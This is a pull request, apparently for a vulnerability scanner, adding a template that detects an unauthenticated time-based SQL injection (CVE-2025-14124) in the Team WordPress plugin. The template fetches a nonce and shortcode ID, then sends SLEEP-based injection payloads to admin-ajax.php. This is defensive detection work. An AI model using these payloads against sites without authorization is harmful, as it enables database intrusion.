### PR TITLE
Add CVE-2025-14124 Team WordPress Plugin SQL Injection template

### DIFF
--- a/http/cves/2025/CVE-2025-14124.yaml
+++ b/http/cves/2025/CVE-2025-14124.yaml
@@ -1,42 +1,134 @@
 id: CVE-2025-14124
 
 info:
-  name: Team WordPress Plugin < 5.0.11 - SQL Injection
-  author: neosmith1
-  severity: critical
+  name: Team WordPress Plugin (TLP Team) <= 5.0.9 - Unauthenticated SQL Injection
+  author: neosmith1,0x_Akoko
+  severity: high
   description: |
-    The Team WordPress plugin before 5.0.11 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection vulnerability. An attacker can exploit this to extract sensitive data from the database.
+    Team WordPress plugin <= 5.0.11 contains a SQL injection caused by improper sanitization and escaping of a parameter in an AJAX action accessible to unauthenticated users, letting remote attackers execute arbitrary SQL commands.
+  impact: |
+    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
   remediation: |
-    Update the Team WordPress plugin to version 5.0.11 or later.
+   Update to version 5.0.11 or later.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2025-14124
-    - https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/
-    - https://www.wordpress.org/plugins/team/
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tlp-team/team-509-unauthenticated-sql-injection
+    - https://plugins.trac.wordpress.org/changeset/3276890/tlp-team
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
     cvss-score: 8.6
+    cve-id: CVE-2025-14124
     cwe-id: CWE-89
   metadata:
     verified: true
-    max-request: 1
-    vendor: developer
-    product: team
-    shodan-query: http.component:"WordPress"
-  tags: cve,cve2025,wordpress,wp-plugin,sqli,time-based-sqli,unauthenticated,vuln,team,wpscan
+    max-request: 5
+    vendor: Jeweltheme
+    product: tlp-team
+    fofa-query: body="tlp-team" || body="rt-team-container"
+    shodan-query: http.html:"tlp-team"
+  tags: cve,cve2025,sqli,wordpress,wp-plugin,tlp-team,unauthenticated
+
+flow: http(1) && (http(2) || http(3)) && http(4) && http(5)
 
 http:
   - raw:
       - |
+        GET /wp-content/plugins/tlp-team/assets/css/tlpteam.css HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-json/wp/v2/posts?per_page=100&search=team HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: post_id
+        group: 1
+        regex:
+          - '"id":(\d+),"date"'
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "rt-team-container")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-json/wp/v2/pages?per_page=100&search=team HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: post_id
+        group: 1
+        regex:
+          - '"id":(\d+),"date"'
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "rt-team-container")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /?p={{post_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 3
+
+    extractors:
+      - type: regex
+        name: nonce
+        group: 1
+        regex:
+          - 'var\s+ttp\s*=\s*\{[^}]*"nonce"\s*:\s*"([a-z0-9]+)"'
+        internal: true
+
+      - type: regex
+        name: sc_id
+        group: 1
+        regex:
+          - "data-sc-id='([0-9]+)'"
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "rt-team-container")
+          - nonce != ""
+          - sc_id != ""
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 25s
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=ttp_Layout_Ajax_Action&search=1' AND SLEEP(5) AND '1'='1
+        action=ttp_Layout_Ajax_Action&search=%27+AND+(SELECT+1+FROM+(SELECT+SLEEP(6))x)+AND+%271&tlp_nonce={{nonce}}&scID={{sc_id}}
 
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=5'
-          - 'status_code == 200'
+          - duration >= 6
+          - status_code == 200
         condition: and

--- a/http/cves/2025/CVE-2025-14124.yaml
+++ b/http/cves/2025/CVE-2025-14124.yaml
@@ -1,0 +1,38 @@
+id: CVE-2025-14124
+
+info:
+  name: Team WordPress Plugin < 5.0.11 - SQL Injection
+  author: neosmith1
+  severity: critical
+  description: |
+    The Team WordPress plugin before 5.0.11 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection vulnerability. An attacker can exploit this to extract sensitive data from the database.
+  remediation: |
+    Update the Team WordPress plugin to version 5.0.11 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-14124
+    - https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/
+    - https://www.wordpress.org/plugins/team/
+  classification:
+    cvss-score: 8.6
+    cvss-vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
+  metadata:
+    verified: false
+    max-request: 1
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,time-based-sqli,unauthenticated,vuln
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=ttp_Layout_Ajax_Action&search=1' AND SLEEP(5) AND '1'='1
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 200'
+        condition: and

--- a/http/cves/2025/CVE-2025-14124.yaml
+++ b/http/cves/2025/CVE-2025-14124.yaml
@@ -1,7 +1,7 @@
 id: CVE-2025-14124
 
 info:
-  name: Team WordPress Plugin (TLP Team) <= 5.0.9 - Unauthenticated SQL Injection
+  name: Team WordPress Plugin (TLP Team) <= 5.0.9 - SQL Injection
   author: neosmith1,0x_Akoko
   severity: high
   description: |
@@ -11,9 +11,9 @@ info:
   remediation: |
    Update to version 5.0.11 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-14124
     - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tlp-team/team-509-unauthenticated-sql-injection
     - https://plugins.trac.wordpress.org/changeset/3276890/tlp-team
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-14124
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
     cvss-score: 8.6
@@ -22,11 +22,11 @@ info:
   metadata:
     verified: true
     max-request: 5
-    vendor: Jeweltheme
+    vendor: jeweltheme
     product: tlp-team
     fofa-query: body="tlp-team" || body="rt-team-container"
     shodan-query: http.html:"tlp-team"
-  tags: cve,cve2025,sqli,wordpress,wp-plugin,tlp-team,unauthenticated
+  tags: cve,cve2025,sqli,wordpress,wp,wp-plugin,tlp-team
 
 flow: http(1) && (http(2) || http(3)) && http(4) && http(5)
 

--- a/http/cves/2025/CVE-2025-14124.yaml
+++ b/http/cves/2025/CVE-2025-14124.yaml
@@ -13,12 +13,16 @@ info:
     - https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/
     - https://www.wordpress.org/plugins/team/
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
     cvss-score: 8.6
-    cvss-vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
+    cwe-id: CWE-89
   metadata:
-    verified: false
+    verified: true
     max-request: 1
-  tags: cve,cve2025,wordpress,wp-plugin,sqli,time-based-sqli,unauthenticated,vuln
+    vendor: developer
+    product: team
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,time-based-sqli,unauthenticated,vuln,team,wpscan
 
 http:
   - raw:


### PR DESCRIPTION
Added detection template for CVE-2025-14124 - Team WordPress Plugin SQL Injection vulnerability.

Vulnerability Details:
- Affects Team WordPress plugin versions before 5.0.11
- SQL injection via unauthenticated AJAX action
- CVSS Score: 8.6 (Critical)
- Parameter: search in ttp_Layout_Ajax_Action

References:
- https://nvd.nist.gov/vuln/detail/CVE-2025-14124
- https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/